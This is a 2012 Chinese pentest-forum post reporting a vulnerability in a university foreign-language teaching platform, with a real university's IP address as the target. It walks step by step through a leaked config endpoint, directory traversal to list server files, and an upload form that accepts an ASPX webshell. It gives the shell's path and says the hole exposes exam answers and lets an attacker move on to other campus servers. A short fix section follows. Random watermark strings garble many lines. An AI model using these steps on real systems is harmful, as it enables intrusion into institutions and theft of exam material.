中国网络渗透测试联盟

标题: 新理念外语网络教学平台文件上传漏洞 [打印本页]

---

作者: admin    时间: 2012-12-4 11:10
标题: 新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

5 X: C$ X, m& J0 Z# x详细说明：

/ n! H( H0 G6 \, _" w' M* }以南开大学的为例:
" _  p; a% U8 u/ l; i, }, W6 Dhttp://222.30.60.3/NPELS
3 J2 O% P3 C+ M( zNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
/ g: F3 U2 h. s; E: L5 F* c1 c<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
3 i3 Q# A5 [% n' A! D4 A) w</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
  r$ R. e( n& f直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
% h$ {0 @4 k; L$ q' [: Y" ~http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../
2 q. Y9 V% G8 E6 Z$ I3 e5 Q7 L: X- S
发现
" |+ i( w, f9 M. rhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
# }  Q5 f2 }9 U* c! y$ |) |3 o上传后继续列目录找到木马地址直接访问即可

7 W+ C# @  C9 S, U( u2 bOOXX

+ t* o7 }! P; K1 [8 vGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：

7 `2 l0 d& ]' ]: E0 A  p列目录：
7 F; N1 c9 X3 I1 r/ |http://222.30.60.3/NPELS/CommonS ... List?version=../../
# v- ]4 @0 E9 I0 P) O文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

上传木马：
7 j" ^( X* q- O6 Xhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

: e# ^4 {3 f8 q( H修复方案：
好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
" J" b8 D/ S& G4 L( d  W8 |# U并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
' L4 X8 U! K7 A8 b" h6 B

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2